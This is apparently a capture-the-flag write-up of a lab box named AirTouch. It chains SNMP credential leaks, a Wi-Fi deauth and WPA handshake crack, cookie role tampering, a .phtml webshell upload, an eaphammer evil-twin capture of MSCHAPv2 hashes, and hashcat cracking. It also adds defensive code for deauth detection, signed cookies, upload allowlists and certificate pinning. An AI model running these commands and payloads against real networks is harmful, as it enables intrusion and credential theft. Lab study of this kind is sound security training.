Basic information

Port scanning

Only TCP port 22 is open; on UDP, SNMP is visible:

```
$ nmap -sC -sV -Pn 10.129.186.97
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 14:50 JST
Nmap scan report for 10.129.186.97
Host is up (0.081s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bd:90:00:15:cf:4b:da:cb:c9:24:05:2b:01:ac:dc:3b (RSA)
| 256 6e:e2:44:70:3c:6b:00:57:16:66:2f:37:58:be:f5:c0 (ECDSA)
|_ 256 ad:d5:d5:f0:0b:af:b2:11:67:5b:07:5c:8e:85:76:76 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.64 seconds

$ sudo nmap -sU 10.129.186.97
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 14:52 JST
Nmap scan report for 10.129.186.97
Host is up (0.081s latency).
Not shown: 998 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
161/udp open snmp

Nmap done: 1 IP address (1 host up) scanned in 1070.39 seconds
```

SNMP

Routine SNMP enumeration turns up a password:

```
snmpwalk -v 1 -c public 10.129.186.97

iso.3.6.1.2.1.1.1.0 = STRING: "\"The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)\""
iso.3.6.1.2.1.1.4.0 = STRING: "admin@AirTouch.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "Consultant"
```

consultant

Log in over SSH with the credentials obtained:

Two images on the user's desktop show that we are now on the consultant's laptop, which sits on its own VLAN, and that other networks and Wi-Fi exist:

The consultant user also has unrestricted sudo, and aircrack is installed, so the next step is clearly to reach the other networks over Wi-Fi:

AirTouch-Internet

capture & crack

So it is routine Wi-Fi enumeration, then a deauth to capture the handshake and crack it:

```
# Start monitor mode
airmon-ng start wlan0

# List Wi-Fi networks
airodump-ng wlan0mon
# AirTouch-Internet channel 6
F0:9F:C2:A3:F1:A7 28:6C:07:FE:A3:22 -29 48 - 1 0 4

# Capture
airodump-ng -c 6 wlan0mon -w capture
# In another terminal, deauth
aireplay-ng --deauth 10 -a F0:9F:C2:A3:F1:A7 wlan0mon -c 28:6C:07:FE:A3:22
```
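A deauth burst like the aireplay-ng run above stands out clearly in a management-frame capture. As an added example that is not part of the original page, this Python flags any transmitter address that emits more than a threshold of deauthentication frames inside a one-second sliding window; the frame records are constructed, and 0xC is the 802.11 deauthentication management subtype.

```python
from collections import defaultdict, deque

DEAUTH = 0xC   # 802.11 management frame subtype: deauthentication
BEACON = 0x8   # 802.11 management frame subtype: beacon

# Constructed capture: (timestamp_s, subtype, transmitter address, receiver address).
# The flood carries the AP's own BSSID as transmitter, exactly as spoofed deauths do.
AP, CLIENT, OTHER_AP = "F0:9F:C2:A3:F1:A7", "28:6C:07:FE:A3:22", "AC:8B:A9:AA:3F:D2"
SAMPLE_FRAMES = (
    [(0.1 * i, BEACON, AP, "FF:FF:FF:FF:FF:FF") for i in range(30)]        # normal beacons
    + [(0.5, DEAUTH, OTHER_AP, CLIENT), (2.7, DEAUTH, OTHER_AP, CLIENT)]  # isolated, benign
    + [(1.0 + 0.01 * i, DEAUTH, AP, CLIENT) for i in range(64)]           # one 64-frame burst
)


def find_deauth_bursts(frames, window_s=1.0, threshold=20):
    """Return (transmitter, burst_start_ts, count) for every transmitter that emits
    more than `threshold` deauth frames inside any `window_s` sliding window.
    Each transmitter is reported once, at the moment the threshold is first exceeded."""
    recent = defaultdict(deque)   # transmitter -> timestamps of its recent deauths
    alerts, seen = [], set()
    for ts, subtype, src, _dst in sorted(frames):
        if subtype != DEAUTH:
            continue
        window = recent[src]
        window.append(ts)
        while ts - window[0] > window_s:   # drop timestamps that fell out of the window
            window.popleft()
        if len(window) > threshold and src not in seen:
            seen.add(src)
            alerts.append((src, window[0], len(window)))
    return alerts


if __name__ == "__main__":
    for src, start, count in find_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst from {src}: {count} frames within 1s starting at t={start:.2f}s")
```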

Back in the first terminal, the handshake has been captured:

Then crack the password:

```
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

KEY FOUND! [ challenge ]
```

wifi

Then connect to the Wi-Fi:

```
sudo wpa_supplicant -Dnl80211 -iwlan3 -c /tmp/miao.conf

sudo dhclient wlan3 -v
```

We get an IP address on the 192.168.3.x subnet:

miao.conf

```
network={
ssid="AirTouch-Internet"
psk="challenge"
scan_ssid=1
key_mgmt=WPA-PSK
proto=WPA2
}
```

PSK Router

Then set up a proxy, and the PSK Router interface is reachable:

```
ssh consultant@10.129.186.105 -D 8090
```

But we do not know the password yet.

decrypt capture

Going back to the capture: decrypt the traffic in Wireshark with the Wi-Fi password, and the cookie can be taken from the HTTP requests; if enough traffic was captured, the password itself can be read directly:

```
manager
2wLFYNh4TSTgA5sNgT4
```

manager

Modify the cookie to log in as manager; for now this is only a user:

admin

This part is simple: the cookie contains a UserRole value, originally user; change it to admin and a function for uploading configuration files appears:
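The UserRole cookie described above is a client-controlled value that the server trusts as-is. As an added illustration that is not code from the original page or the target application, the following Python contrasts that pattern with a session cookie carrying only an HMAC-signed username, with the role resolved server-side; the secret, the user table and the cookie names are assumptions.

```python
import base64
import hashlib
import hmac

# Constructed server-side state (assumptions; the page does not show the real app).
SECRET_KEY = b"constructed-server-secret-rotate-me"
USER_ROLES = {"manager": "user", "user": "admin"}   # roles live server-side only


def vulnerable_role(cookies: dict) -> str:
    """The pattern the page describes: the server believes the UserRole the client sent."""
    return cookies.get("UserRole", "user")


def issue_session(username: str) -> str:
    """Cookie value = username + '.' + base64url(HMAC-SHA256(secret, username))."""
    mac = hmac.new(SECRET_KEY, username.encode(), hashlib.sha256).digest()
    return username + "." + base64.urlsafe_b64encode(mac).decode().rstrip("=")


def hardened_role(cookies: dict) -> str:
    """Ignore any client-supplied role; accept only an intact signed session and
    resolve the role from the server-side table."""
    token = cookies.get("session", "")
    if not token.isascii():          # compare_digest on str requires ASCII input
        return "anonymous"
    username, _, _sig = token.rpartition(".")
    if not username or not hmac.compare_digest(issue_session(username), token):
        return "anonymous"           # missing, forged or tampered signature
    return USER_ROLES.get(username, "anonymous")


if __name__ == "__main__":
    tampered = {"session": issue_session("manager"), "UserRole": "admin"}
    forged = {"session": "user.AAAA"}
    print("vulnerable:", vulnerable_role(tampered))   # admin
    print("hardened:  ", hardened_role(tampered))     # user
    print("forged:    ", hardened_role(forged))       # anonymous
```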

webshell

Uploading .php directly is not allowed, but a basic bypass works: .phtml, .phar and the like can be uploaded, giving www-data privileges:

Reading login.php directly also yields the other user's password:

```
http://192.168.3.1/uploads/shell.phtml?cmd=cat%20../login.php

$logins = array(
/*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
);
```
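The upload filter described above refuses only the literal .php extension, which is why .phtml and .phar get through. As an added example that is not part of the original page, this Python contrasts that denylist with an allowlist check and random on-disk names; the accepted extensions and the PHP-family list are assumptions, since the page does not give the application's actual rules.

```python
import os
import uuid

# Assumptions: the page does not show the real rules, so the accepted "configuration
# file" extensions and the PHP-family list below are constructed for this example.
ALLOWED_EXTENSIONS = {"conf", "txt", "json"}
PHP_FAMILY = {"php", "php3", "php4", "php5", "php7", "phps", "pht", "phtml", "phar"}


def denylist_allows(filename: str) -> bool:
    """The weak check the page describes: only a literal .php suffix is refused,
    so shell.phtml or shell.phar pass and the web server still executes them."""
    return not filename.lower().endswith(".php")


def allowlist_allows(filename: str) -> bool:
    """Hardened check: plain basename, a final extension on the allowlist, and no
    PHP-family token anywhere in the dotted name (Apache AddHandler can match any part)."""
    if filename != os.path.basename(filename) or "\x00" in filename or filename.startswith("."):
        return False
    parts = filename.lower().split(".")
    if len(parts) < 2 or parts[-1] not in ALLOWED_EXTENSIONS:
        return False
    return not any(part in PHP_FAMILY for part in parts[:-1])


def stored_name(filename: str) -> str:
    """Never keep the client's name on disk: store under a random name plus the
    validated extension, in a directory the web server does not execute from."""
    if not allowlist_allows(filename):
        raise ValueError("rejected upload name: %r" % filename)
    return "%s.%s" % (uuid.uuid4().hex, filename.rsplit(".", 1)[1].lower())


if __name__ == "__main__":
    for name in ("shell.phtml", "shell.php.conf", "../login.php", "router.conf"):
        print(f"{name:16} denylist={denylist_allows(name)!s:5} allowlist={allowlist_allows(name)}")
```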

AirTouch-AP-PSK & user flag

SSH into AirTouch-AP-PSK as user:

```
ssh user@192.168.3.1
JunDRDZKHDnpkpDDvay
```

Unrestricted sudo; the user flag is in root's home directory:

send_certs.sh

send_certs.sh also gives the remote user's password and the IP of the next subnet:

```
#!/bin/bash

# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.

# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"

# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"
```

There are also some certificate files in the certs-backup directory, which will be needed in the next step.

eaphammer

Back on AirTouch-Consultant, root's directory contains eaphammer, an obvious hint that the next step is an evil twin attack:

Step by step, obtain the AirTouch-Office authentication hash:

```
./eaphammer --cert-wizard import --server-cert ../server.crt --private-key ../server.key --ca-cert ../ca.crt

./eaphammer --cert-wizard list

./eaphammer --bssid 'AC:8B:A9:AA:3F:D2' --essid 'AirTouch-Office' --channel 44 --interface wlan3 --auth wpa-eap --creds

# Wait a few minutes and the hash arrives
mschapv2: Sat Jan 24 10:30:27 2026
domain\username: AirTouch\r4ulcl
username: r4ulcl
challenge: cb:16:26:f1:1a:1b:da:47
response: 44:3f:b4:84:79:5a:c4:fa:3b:3e:f4:0c:77:3c:6d:f5:d0:23:f6:f1:bb:27:ab:ed
jtr NETNTLM: r4ulcl:$NETNTLM$cb1626f11a1bda47$443fb484795ac4fa3b3ef40c773c6df5d023f6f1bb27abed
hashcat NETNTLM: r4ulcl::::443fb484795ac4fa3b3ef40c773c6df5d023f6f1bb27abed:cb1626f11a1bda47
```

Crack the password:

```
$ sudo hashcat -m 5500 hash.txt ~/Tools/dict/rockyou.txt

laboratory
```

AirTouch-Office

Then connect to the office Wi-Fi and get an IP on the corp subnet:

```
wpa_supplicant -B -i wlan6 -c /tmp/office.conf

dhclient wlan6
```

office.conf

```
ctrl_interface=/var/run/wpa_supplicant
network={
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="AirTouch\\r4ulcl"
password="laboratory"
phase2="auth=MSCHAPV2"
}
```
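office.conf above validates nothing about the RADIUS server, which is the client-side weakness a rogue AP like the one in the eaphammer section relies on to collect MSCHAPv2 hashes. As an added, hypothetical client configuration (not from the page), the version below pins the issuing CA and the server name before any inner credentials are sent; the CA path, hostname and anonymous identity are assumptions.

```conf
ctrl_interface=/var/run/wpa_supplicant
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    # Outer identity hides the real username from anyone watching the EAP-Identity exchange.
    anonymous_identity="anonymous@airtouch.htb"
    identity="AirTouch\\<username>"
    password="<user password>"
    # Only trust a RADIUS server certificate that chains to this CA (path is an assumption).
    ca_cert="/etc/ssl/certs/airtouch-radius-ca.pem"
    # And only if its subject/SAN is exactly this name (hostname is an assumption).
    domain_match="radius.airtouch.htb"
    phase2="auth=MSCHAPV2"
}
```

On this box the rogue AP was built from the real server.crt and server.key copied out of certs-backup, so pinning alone would not have refused it: the leaked key has to be rotated and the sshpass-based sync that exposes it removed.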

AirTouch-AP-MGT

Then connect to AirTouch-AP-MGT as the remote user, with the password found earlier:

```
ssh remote@10.10.10.1
xGgWEwqUpfoOVsLeROeG
```

hostapd

Then the admin password is found in the hostapd files:

```
remote@AirTouch-AP-MGT:~$ cat /etc/hostapd/hostapd_wpe.eap_user

"AirTouch\r4ulcl" MSCHAPV2 "laboratory" [2]
"admin" MSCHAPV2 "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
```

admin

Switch to the admin user, which has unrestricted sudo:

root flag

admin has unrestricted sudo:

shadow

```
remote:$6$ejcLoDyi/qlm6pQd$0pt.GvF47D3LbKCaJ283OVQ1Fi25cxqNy8sgO5mnsnIujrWOGkoGL/./5vAmdb5JSHGu0vPTE./Rh8bf6AJKZ1:20051:0:99999:7:::
admin:$6$vSTu8Nz336boicIm$pq/RGKu7jne0kd18NC9QgB8WCliwCbZTgiP.g71YI6BchhHvVRiW40W.GoMl9rGv6EyKyYaUxzRP5XWYIiKyL.:20051:0:99999:7:::
```

References